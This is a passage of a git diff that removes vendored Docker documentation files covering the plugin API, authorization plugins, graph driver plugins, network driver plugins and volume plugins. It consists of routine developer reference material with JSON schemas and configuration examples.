-[Flocker plugin](https://clusterhq.com/docker-plugin/)                              | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines.
-[gce-docker plugin](https://github.com/mcuadros/gce-docker)                         | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks).
-[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs)             | A volume plugin that provides multi-host volumes management for Docker using GlusterFS.
-[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux)                         | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3.
-[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/)    | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays.
-[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs)               | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume.
-[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz)                 | A plugin that provides credentials and secret management using Keywhiz as a central repository.
-[Local Persist Plugin](https://github.com/CWSpear/local-persist)                    | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`.
-[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP)                         | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future.
-[Netshare plugin](https://github.com/ContainX/docker-volume-netshare)                 | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems.
-[OpenStorage Plugin](https://github.com/libopenstorage/openstorage)                 | A cluster-aware volume plugin that provides volume management for file and block storage solutions.  It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few.
-[Portworx Volume Plugin](https://github.com/portworx/px-dev)                        | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler.
-[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume)                   | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform.
-[REX-Ray plugin](https://github.com/emccode/rexray)                                 | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC.
-[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices.
-[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere)    | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments.
-
-### Authorization plugins
-
- Plugin                                                       | Description
-------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name).
-
-## Troubleshooting a plugin
-
-If you are having problems with Docker after loading a plugin, ask the authors
-of the plugin for help. The Docker team may not be able to assist you.
-
-## Writing a plugin
-
-If you are interested in writing a plugin for Docker, or seeing how they work
-under the hood, see the [docker plugins reference](plugin_api.md).
diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md
deleted file mode 100644
index 693b77a2f3..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/plugin_api.md
+++ /dev/null
@@ -1,196 +0,0 @@
----
-title: "Plugins API"
-description: "How to write Docker plugins extensions "
-keywords: "API, Usage, plugins, documentation, developer"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Docker Plugin API
-
-Docker plugins are out-of-process extensions which add capabilities to the
-Docker Engine.
-
-This document describes the Docker Engine plugin API. To view information on
-plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md).
-
-This page is intended for people who want to develop their own Docker plugin.
-If you just want to learn about or use Docker plugins, look
-[here](legacy_plugins.md).
-
-## What plugins are
-
-A plugin is a process running on the same or a different host as the docker daemon,
-which registers itself by placing a file on the same docker host in one of the plugin
-directories described in [Plugin discovery](#plugin-discovery).
-
-Plugins have human-readable names, which are short, lowercase strings. For
-example, `flocker` or `weave`.
-
-Plugins can run inside or outside containers. Currently running them outside
-containers is recommended.
-
-## Plugin discovery
-
-Docker discovers plugins by looking for them in the plugin directory whenever a
-user or container tries to use one by name.
-
-There are three types of files which can be put in the plugin directory.
-
-* `.sock` files are UNIX domain sockets.
-* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`.
-* `.json` files are text files containing a full json specification for the plugin.
-
-Plugins with UNIX domain socket files must run on the same docker host, whereas
-plugins with spec or json files can run on a different host if a remote URL is specified.
-
-UNIX domain socket files must be located under `/run/docker/plugins`, whereas
-spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`.
-
-The name of the file (excluding the extension) determines the plugin name.
-
-For example, the `flocker` plugin might create a UNIX socket at
-`/run/docker/plugins/flocker.sock`.
-
-You can define each plugin into a separated subdirectory if you want to isolate definitions from each other.
-For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only
-mount `/run/docker/plugins/flocker` inside the `flocker` container.
-
-Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under
-`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as
-soon as it finds the first plugin definition with the given name.
-
-### JSON specification
-
-This is the JSON format for a plugin:
-
-```json
-{
-  "Name": "plugin-example",
-  "Addr": "https://example.com/docker/plugin",
-  "TLSConfig": {
-    "InsecureSkipVerify": false,
-    "CAFile": "/usr/shared/docker/certs/example-ca.pem",
-    "CertFile": "/usr/shared/docker/certs/example-cert.pem",
-    "KeyFile": "/usr/shared/docker/certs/example-key.pem"
-  }
-}
-```
-
-The `TLSConfig` field is optional and TLS will only be verified if this configuration is present.
-
-## Plugin lifecycle
-
-Plugins should be started before Docker, and stopped after Docker.  For
-example, when packaging a plugin for a platform which supports `systemd`, you
-might use [`systemd` dependencies](
-http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to
-manage startup and shutdown order.
-
-When upgrading a plugin, you should first stop the Docker daemon, upgrade the
-plugin, then start Docker again.
-
-## Plugin activation
-
-When a plugin is first referred to -- either by a user referring to it by name
-(e.g.  `docker run --volume-driver=foo`) or a container already configured to
-use a plugin being started -- Docker looks for the named plugin in the plugin
-directory and activates it with a handshake. See Handshake API below.
-
-Plugins are *not* activated automatically at Docker daemon startup. Rather,
-they are activated only lazily, or on-demand, when they are needed.
-
-## Systemd socket activation
-
-Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers)
-natively supports socket activation. In order for a plugin to be socket activated it needs
-a `service` file and a `socket` file.
-
-The `service` file (for example `/lib/systemd/system/your-plugin.service`):
-
-```
-[Unit]
-Description=Your plugin
-Before=docker.service
-After=network.target your-plugin.socket
-Requires=your-plugin.socket docker.service
-
-[Service]
-ExecStart=/usr/lib/docker/your-plugin
-
-[Install]
-WantedBy=multi-user.target
-```
-The `socket` file (for example `/lib/systemd/system/your-plugin.socket`):
-
-```
-[Unit]
-Description=Your plugin
-
-[Socket]
-ListenStream=/run/docker/plugins/your-plugin.sock
-
-[Install]
-WantedBy=sockets.target
-```
-
-This will allow plugins to be actually started when the Docker daemon connects to
-the sockets they're listening on (for instance the first time the daemon uses them
-or if one of the plugin goes down accidentally).
-
-## API design
-
-The Plugin API is RPC-style JSON over HTTP, much like webhooks.
-
-Requests flow *from* the Docker daemon *to* the plugin.  So the plugin needs to
-implement an HTTP server and bind this to the UNIX socket mentioned in the
-"plugin discovery" section.
-
-All requests are HTTP `POST` requests.
-
-The API is versioned via an Accept header, which currently is always set to
-`application/vnd.docker.plugins.v1+json`.
-
-## Handshake API
-
-Plugins are activated via the following "handshake" API call.
-
-### /Plugin.Activate
-
-**Request:** empty body
-
-**Response:**
-```
-{
-    "Implements": ["VolumeDriver"]
-}
-```
-
-Responds with a list of Docker subsystems which this plugin implements.
-After activation, the plugin will then be sent events from this subsystem.
-
-Possible values are:
-
-* [`authz`](plugins_authorization.md)
-* [`NetworkDriver`](plugins_network.md)
-* [`VolumeDriver`](plugins_volume.md)
-
-
-## Plugin retries
-
-Attempts to call a method on a plugin are retried with an exponential backoff
-for up to 30 seconds. This may help when packaging plugins as containers, since
-it gives plugin containers a chance to start up before failing any user
-containers which depend on them.
-
-## Plugins helpers
-
-To ease plugins development, we're providing an `sdk` for each kind of plugins
-currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers).
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
deleted file mode 100644
index ac1837f754..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
+++ /dev/null
@@ -1,260 +0,0 @@
----
-title: "Access authorization plugin"
-description: "How to create authorization plugins to manage access control to your Docker daemon."
-keywords: "security, authorization, authentication, docker, documentation, plugin, extend"
-redirect_from:
-- "/engine/extend/authorization/"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Create an authorization plugin
-
-This document describes the Docker Engine plugins generally available in Docker
-Engine. To view information on plugins managed by Docker Engine,
-refer to [Docker Engine plugin system](index.md).
-
-Docker's out-of-the-box authorization model is all or nothing. Any user with
-permission to access the Docker daemon can run any Docker client command. The
-same is true for callers using Docker's Engine API to contact the daemon. If you
-require greater access control, you can create authorization plugins and add
-them to your Docker daemon configuration. Using an authorization plugin, a
-Docker administrator can configure granular access policies for managing access
-to Docker daemon.
-
-Anyone with the appropriate skills can develop an authorization plugin. These
-skills, at their most basic, are knowledge of Docker, understanding of REST, and
-sound programming knowledge. This document describes the architecture, state,
-and methods information available to an authorization plugin developer.
-
-## Basic principles
-
-Docker's [plugin infrastructure](plugin_api.md) enables
-extending Docker by loading, removing and communicating with
-third-party components using a generic API. The access authorization subsystem
-was built using this mechanism.
-
-Using this subsystem, you don't need to rebuild the Docker daemon to add an
-authorization plugin.  You can add a plugin to an installed Docker daemon. You do
-need to restart the Docker daemon to add a new plugin.
-
-An authorization plugin approves or denies requests to the Docker daemon based
-on both the current authentication context and the command context. The
-authentication context contains all user details and the authentication method.
-The command context contains all the relevant request data.
-
-Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md).
-Each plugin must reside within directories described under the
-[Plugin discovery](plugin_api.md#plugin-discovery) section.
-
-**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication
-respectively.
-
-## Default user authorization mechanism
-
-If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name.
-That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`.
-
-## Basic architecture
-
-You are responsible for registering your plugin as part of the Docker daemon
-startup. You can install multiple plugins and chain them together. This chain
-can be ordered. Each request to the daemon passes in order through the chain.
-Only when all the plugins grant access to the resource, is the access granted.
-
-When an HTTP request is made to the Docker daemon through the CLI or via the
-Engine API, the authentication subsystem passes the request to the installed
-authentication plugin(s). The request contains the user (caller) and command
-context. The plugin is responsible for deciding whether to allow or deny the
-request.
-
-The sequence diagrams below depict an allow and deny authorization flow:
-
-![Authorization Allow flow](images/authz_allow.png)
-
-![Authorization Deny flow](images/authz_deny.png)
-
-Each request sent to the plugin includes the authenticated user, the HTTP
-headers, and the request/response body. Only the user name and the
-authentication method used are passed to the plugin. Most importantly, no user
-credentials or tokens are passed. Finally, not all request/response bodies
-are sent to the authorization plugin. Only those request/response bodies where
-the `Content-Type` is either `text/*` or `application/json` are sent.
-
-For commands that can potentially hijack the HTTP connection (`HTTP
-Upgrade`), such as `exec`, the authorization plugin is only called for the
-initial HTTP requests. Once the plugin approves the command, authorization is
-not applied to the rest of the flow. Specifically, the streaming data is not
-passed to the authorization plugins. For commands that return chunked HTTP
-response, such as `logs` and `events`, only the HTTP request is sent to the
-authorization plugins.
-
-During request/response processing, some authorization flows might
-need to do additional queries to the Docker daemon. To complete such flows,
-plugins can call the daemon API similar to a regular user. To enable these
-additional queries, the plugin must provide the means for an administrator to
-configure proper authentication and security policies.
-
-## Docker client flows
-
-To enable and configure the authorization plugin, the plugin developer must
-support the Docker client interactions detailed in this section.
-
-### Setting up Docker daemon
-
-Enable the authorization plugin with a dedicated command line flag in the
-`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID`
-value. This value can be the plugin’s socket or a path to a specification file.
-Authorization plugins can be loaded without restarting the daemon. Refer
-to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information.
-
-```bash
-$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
-```
-
-Docker's authorization subsystem supports multiple `--authorization-plugin` parameters.
-
-### Calling authorized command (allow)
-
-```bash
-$ docker pull centos
-...
-f1b10cd84249: Pull complete
-...
-```
-
-### Calling unauthorized command (deny)
-
-```bash
-$ docker pull centos
-...
-docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed.
-```
-
-### Error from plugins
-
-```bash
-$ docker pull centos
-...
-docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
-```
-
-## API schema and implementation
-
-In addition to Docker's standard plugin registration method, each plugin
-should implement the following two methods:
-
-* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request.
-
-* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client.
-
-#### /AuthZPlugin.AuthZReq
-
-**Request**:
-
-```json
-{
-    "User":              "The user identification",
-    "UserAuthNMethod":   "The authentication method used",
-    "RequestMethod":     "The HTTP method",
-    "RequestURI":        "The HTTP request URI",
-    "RequestBody":       "Byte array containing the raw HTTP request body",
-    "RequestHeader":     "Byte array containing the raw HTTP request header as a map[string][]string "
-}
-```
-
-**Response**:
-
-```json
-{
-    "Allow": "Determined whether the user is allowed or not",
-    "Msg":   "The authorization message",
-    "Err":   "The error message if things go wrong"
-}
-```
-#### /AuthZPlugin.AuthZRes
-
-**Request**:
-
-```json
-{
-    "User":              "The user identification",
-    "UserAuthNMethod":   "The authentication method used",
-    "RequestMethod":     "The HTTP method",
-    "RequestURI":        "The HTTP request URI",
-    "RequestBody":       "Byte array containing the raw HTTP request body",
-    "RequestHeader":     "Byte array containing the raw HTTP request header as a map[string][]string",
-    "ResponseBody":      "Byte array containing the raw HTTP response body",
-    "ResponseHeader":    "Byte array containing the raw HTTP response header as a map[string][]string",
-    "ResponseStatusCode":"Response status code"
-}
-```
-
-**Response**:
-
-```json
-{
-   "Allow":              "Determined whether the user is allowed or not",
-   "Msg":                "The authorization message",
-   "Err":                "The error message if things go wrong"
-}
-```
-
-### Request authorization
-
-Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message.
-
-#### Daemon -> Plugin
-
-Name                   | Type              | Description
------------------------|-------------------|-------------------------------------------------------
-User                   | string            | The user identification
-Authentication method  | string            | The authentication method used
-Request method         | enum              | The HTTP method (GET/DELETE/POST)
-Request URI            | string            | The HTTP request URI including API version (e.g., v.1.17/containers/json)
-Request headers        | map[string]string | Request headers as key value pairs (without the authorization header)
-Request body           | []byte            | Raw request body
-
-
-#### Plugin -> Daemon
-
-Name    | Type   | Description
---------|--------|----------------------------------------------------------------------------------
-Allow   | bool   | Boolean value indicating whether the request is allowed or denied
-Msg     | string | Authorization message (will be returned to the client in case the access is denied)
-Err     | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information)
-
-### Response authorization
-
-The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message.
-
-#### Daemon -> Plugin
-
-
-Name                    | Type              | Description
------------------------ |------------------ |----------------------------------------------------
-User                    | string            | The user identification
-Authentication method   | string            | The authentication method used
-Request method          | string            | The HTTP method (GET/DELETE/POST)
-Request URI             | string            | The HTTP request URI including API version (e.g., v.1.17/containers/json)
-Request headers         | map[string]string | Request headers as key value pairs (without the authorization header)
-Request body            | []byte            | Raw request body
-Response status code    | int               | Status code from the docker daemon
-Response headers        | map[string]string | Response headers as key value pairs
-Response body           | []byte            | Raw docker daemon response body
-
-
-#### Plugin -> Daemon
-
-Name    | Type   | Description
---------|--------|----------------------------------------------------------------------------------
-Allow   | bool   | Boolean value indicating whether the response is allowed or denied
-Msg     | string | Authorization message (will be returned to the client in case the access is denied)
-Err     | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information)
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
deleted file mode 100644
index d91c383b5f..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
+++ /dev/null
@@ -1,376 +0,0 @@
----
-title: "Graphdriver plugins"
-description: "How to manage image and container filesystems with external plugins"
-keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api"
-advisory: experimental
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-
-## Changelog
-
-### 1.13.0
-
-- Support v2 plugins
-
-# Docker graph driver plugins
-
-Docker graph driver plugins enable admins to use an external/out-of-process
-graph driver for use with Docker engine. This is an alternative to using the
-built-in storage drivers, such as aufs/overlay/devicemapper/btrfs.
-
-You need to install and enable the plugin and then restart the Docker daemon
-before using the plugin. See the following example for the correct ordering
-of steps.
-
-```
-$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver
-<output supressed>
-$ pkill dockerd
-$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin
-```
-
-# Write a graph driver plugin
-
-See the [plugin documentation](/docs/extend/index.md) for detailed information
-on the underlying plugin protocol.
-
-
-## Graph Driver plugin protocol
-
-If a plugin registers itself as a `GraphDriver` when activated, then it is
-expected to provide the rootfs for containers as well as image layer storage.
-
-### /GraphDriver.Init
-
-**Request**:
-```json
-{
-  "Home": "/graph/home/path",
-  "Opts": [],
-  "UIDMaps": [],
-  "GIDMaps": []
-}
-```
-
-Initialize the graph driver plugin with a home directory and array of options.
-These are passed through from the user, but the plugin is not required to parse
-or honor them.
-
-The request also includes a list of UID and GID mappings, structed as follows:
-```json
-{
-  "ContainerID": 0,
-  "HostID": 0,
-  "Size": 0
-}
-```
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-
-### /GraphDriver.Create
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
-  "MountLabel": "",
-  "StorageOpt": {}
-}
-```
-
-Create a new, empty, read-only filesystem layer with the specified
-`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no
-parent layer. `StorageOpt` is map of strings which indicate storage options.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.CreateReadWrite
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
-  "MountLabel": "",
-  "StorageOpt": {}
-}
-```
-
-Similar to `/GraphDriver.Create` but creates a read-write filesystem layer.
-
-### /GraphDriver.Remove
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Remove the filesystem layer with this given `ID`.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Get
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "MountLabel": ""
-}
-```
-
-Get the mountpoint for the layered filesystem referred to by the given `ID`.
-
-**Response**:
-```json
-{
-  "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Err": ""
-}
-```
-
-Respond with the absolute path to the mounted layered filesystem.
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Put
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Release the system resources for the specified `ID`, such as unmounting the
-filesystem layer.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Exists
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Determine if a filesystem layer with the specified `ID` exists.
-
-**Response**:
-```json
-{
-  "Exists": true
-}
-```
-
-Respond with a boolean for whether or not the filesystem layer with the specified
-`ID` exists.
-
-### /GraphDriver.Status
-
-**Request**:
-```json
-{}
-```
-
-Get low-level diagnostic information about the graph driver.
-
-**Response**:
-```json
-{
-  "Status": [[]]
-}
-```
-
-Respond with a 2-D array with key/value pairs for the underlying status
-information.
-
-
-### /GraphDriver.GetMetadata
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
-}
-```
-
-Get low-level diagnostic information about the layered filesystem with the
-with the specified `ID`
-
-**Response**:
-```json
-{
-  "Metadata": {},
-  "Err": ""
-}
-```
-
-Respond with a set of key/value pairs containing the low-level diagnostic
-information about the layered filesystem.
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.Cleanup
-
-**Request**:
-```json
-{}
-```
-
-Perform necessary tasks to release resources help by the plugin, such as
-unmounting all the layered file systems.
-
-**Response**:
-```json
-{
-  "Err": ""
-}
-```
-
-Respond with a non-empty string error if an error occurred.
-
-
-### /GraphDriver.Diff
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
-}
-```
-
-Get an archive of the changes between the filesystem layers specified by the `ID`
-and `Parent`. `Parent` may be an empty string, in which case there is no parent.
-
-**Response**:
-```
-{{ TAR STREAM }}
-```
-
-### /GraphDriver.Changes
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
-}
-```
-
-Get a list of changes between the filesystem layers specified by the `ID` and
-`Parent`. If `Parent` is an empty string, there is no parent.
-
-**Response**:
-```json
-{
-  "Changes": [{}],
-  "Err": ""
-}
-```
-
-Respond with a list of changes. The structure of a change is:
-```json
-  "Path": "/some/path",
-  "Kind": 0,
-```
-
-Where the `Path` is the filesystem path within the layered filesystem that is
-changed and `Kind` is an integer specifying the type of change that occurred:
-
-- 0 - Modified
-- 1 - Added
-- 2 - Deleted
-
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.ApplyDiff
-
-**Request**:
-```
-{{ TAR STREAM }}
-```
-
-Extract the changeset from the given diff into the layer with the specified `ID`
-and `Parent`
-
-**Query Parameters**:
-
-- id (required)- the `ID` of the new filesystem layer to extract the diff to
-- parent (required)- the `Parent` of the given `ID`
-
-**Response**:
-```json
-{
-  "Size": 512366,
-  "Err": ""
-}
-```
-
-Respond with the size of the new layer in bytes.
-Respond with a non-empty string error if an error occurred.
-
-### /GraphDriver.DiffSize
-
-**Request**:
-```json
-{
-  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
-  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
-}
-```
-
-Calculate the changes between the specified `ID`
-
-**Response**:
-```json
-{
-  "Size": 512366,
-  "Err": ""
-}
-```
-
-Respond with the size changes between the specified `ID` and `Parent`
-Respond with a non-empty string error if an error occurred.
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md
deleted file mode 100644
index a974862fa6..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/plugins_network.md
+++ /dev/null
@@ -1,77 +0,0 @@
----
-title: "Docker network driver plugins"
-description: "Network driver plugins."
-keywords: "Examples, Usage, plugins, docker, documentation, user guide"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Engine network driver plugins
-
-This document describes Docker Engine network driver plugins generally
-available in Docker Engine. To view information on plugins
-managed by Docker Engine, refer to [Docker Engine plugin system](index.md).
-
-Docker Engine network plugins enable Engine deployments to be extended to
-support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN
-or something completely different. Network driver plugins are supported via the
-LibNetwork project. Each plugin is implemented as a  "remote driver" for
-LibNetwork, which shares plugin infrastructure with Engine. Effectively, network
-driver plugins are activated in the same way as other plugins, and use the same
-kind of protocol.
-
-## Network driver plugins and swarm mode
-
-Docker 1.12 adds support for cluster management and orchestration called
-[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently
-only supports the built-in overlay driver for networking. Therefore existing
-networking plugins will not work in swarm mode.
-
-When you run Docker Engine outside of swarm mode, all networking plugins that
-worked in Docker 1.11 will continue to function normally. They do not require
-any modification.
-
-## Using network driver plugins
-
-The means of installing and running a network driver plugin depend on the
-particular plugin. So, be sure to install your plugin according to the
-instructions obtained from the plugin developer.
-
-Once running however, network driver plugins are used just like the built-in
-network drivers: by being mentioned as a driver in network-oriented Docker
-commands. For example,
-
-    $ docker network create --driver weave mynet
-
-Some network driver plugins are listed in [plugins](legacy_plugins.md)
-
-The `mynet` network is now owned by `weave`, so subsequent commands
-referring to that network will be sent to the plugin,
-
-    $ docker run --network=mynet busybox top
-
-
-## Write a network plugin
-
-Network plugins implement the [Docker plugin
-API](plugin_api.md) and the network plugin protocol
-
-## Network plugin protocol
-
-The network driver protocol, in addition to the plugin activation call, is
-documented as part of libnetwork:
-[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md).
-
-# Related Information
-
-To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`.
-
--  [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/)
--  The [LibNetwork](https://github.com/docker/libnetwork) project
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md
deleted file mode 100644
index c060bf39b1..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md
+++ /dev/null
@@ -1,276 +0,0 @@
----
-title: "Volume plugins"
-description: "How to manage data with external volume plugins"
-keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Write a volume plugin
-
-Docker Engine volume plugins enable Engine deployments to be integrated with
-external storage systems, such as Amazon EBS, and enable data volumes to persist
-beyond the lifetime of a single Engine host. See the
-[plugin documentation](legacy_plugins.md) for more information.
-
-## Changelog
-
-### 1.13.0
-
-- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398)
-
-### 1.12.0
-
-- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#))
-- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077))
-
-### 1.10.0
-
-- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534))
-- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534))
-
-### 1.8.0
-
-- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659))
-
-## Command-line changes
-
